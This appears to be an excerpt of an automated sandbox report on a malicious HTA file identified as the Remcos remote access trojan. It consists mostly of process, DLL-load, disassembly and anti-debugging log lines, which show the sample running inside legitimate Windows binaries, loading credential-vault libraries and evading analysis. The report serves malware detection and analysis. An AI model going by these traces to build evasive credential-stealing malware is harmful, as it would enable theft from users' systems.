Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Section loaded: cryptbase.dll	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 3_2_05CDCEFA push eax; iretd	3_2_05CDCF2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004570CF push ecx; ret	12_2_004570E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00435226 push ecx; ret	12_2_00435239
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0045D9ED push esi; ret	12_2_0045D9F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00457A00 push eax; ret	12_2_00457A1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_10002806 push ecx; ret	12_2_10002819
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00446B75 push ecx; ret	14_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00452BB4 push eax; ret	14_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044DDB0 push eax; ret	14_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044DDB0 push eax; ret	14_2_0044DDEC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0044B090 push eax; ret	15_2_0044B0A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0044B090 push eax; ret	15_2_0044B0CC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00451D34 push eax; ret	15_2_00451D41
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00444E71 push ecx; ret	15_2_00444E81
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414060 push eax; ret	16_2_00414074
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414060 push eax; ret	16_2_0041409C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00414039 push ecx; ret	16_2_00414049
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004164EB push 0000006Ah; retf	16_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00416553 push 0000006Ah; retf	16_2_004165C4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00416555 push 0000006Ah; retf	16_2_004165C4

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4780	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 1444	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 8543	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8268	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348	Thread sleep count: 1444 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348	Thread sleep time: -4332000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348	Thread sleep count: 8543 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8348	Thread sleep time: -25629000s >= -30000s	Jump to behavior

Source: CasPol.exe, 0000000C.00000002.3706884561.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000003.00000003.1293173297.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296945809.000000000319C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.000000000317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298085040.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293173297.0000000003176000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1295724945.0000000003190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1290712578.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.0000000003184000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706884561.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000A.00000002.1420334997.0000000006D70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	API call chain: ExitProcess graph end node			graph_12-55124
Source: C:\Windows\SysWOW64\recover.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004438F4 mov eax, dword ptr fs:[00000030h]		12_2_004438F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h]		12_2_10004AB4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00435398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0043B88D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00434D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00434F01 SetUnhandledExceptionFilter,	12_2_00434F01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_100060E2
